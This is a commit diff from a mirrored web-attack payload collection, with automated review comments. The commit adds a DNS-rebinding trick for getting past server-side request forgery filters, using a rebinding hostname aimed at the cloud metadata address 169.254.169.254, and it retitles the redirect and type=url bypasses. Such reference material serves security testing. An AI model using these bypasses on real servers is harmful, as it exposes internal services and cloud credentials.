mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-06 17:02:53 +01:00
Added DNS Rebinding
parent
c39c904c9a
commit
d5c1f39c0f
1 changed files with 10 additions and 2 deletions
|
|
@ -221,7 +221,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/
|
||||||
|
|
||||||

|

|
||||||
|
|
||||||
### Bypassing using other tricks
|
### Bypassing using a redirect
|
||||||
[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
|
[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
|
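Review bot: Renaming the heading from "### Bypassing using other tricks" to "### Bypassing using a redirect" changes its generated anchor from #bypassing-using-other-tricks to #bypassing-using-a-redirect, so any summary or cross-link in the README that points at the old anchor has to be updated in the same commit. The new heading also now repeats the "[using a redirect]" link text directly under it; consider turning that line into a short sentence that introduces the PortSwigger reference.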
@ -230,7 +230,7 @@ http://127.1.1.1:80#\@127.2.2.2:80/
|
||||||
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
|
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
|
||||||
```
|
```
|
||||||
|
|
||||||
Using type=url
|
### Bypassing using type=url
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
Change "type=file" to "type=url"
|
Change "type=file" to "type=url"
|
||||||
|
|
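Review bot: The promoted heading "### Bypassing using type=url" sits directly above a fence tagged powershell whose visible content ("Change "type=file" to "type=url"") is plain instructions rather than PowerShell. Since this hunk already touches the section, retag that fence as text so the steps are not syntax-highlighted as code.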
@ -238,6 +238,14 @@ Paste URL in text field and hit enter
|
||||||
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypassing using DNS Rebinding (TOCTOU)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
Create a domain that change between two IPs. http://1u.ms/ exists for this purpose.
|
||||||
|
For example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain:
|
||||||
|
make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms
|
||||||
|
```
|
||||||
|
|
||||||
## SSRF exploitation via URL Scheme
|
## SSRF exploitation via URL Scheme
|
||||||
|
|
||||||
### File
|
### File
|
||||||
|
|
|
||||||
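Review bot: The added prose line writes the second address as "169.254-169.254"; it should read 169.254.169.254, with the hyphenated form kept only in the hostname on the following line, and "a domain that change" should be "changes". The heading labels this TOCTOU, but the block never says what is checked and what is used: add one sentence stating that the filter resolves the name once for validation and the fetch resolves it again, so readers can see that resolving once and connecting to the validated address closes the gap. The new block is also prose inside a fence tagged powershell; a plain text fence fits better.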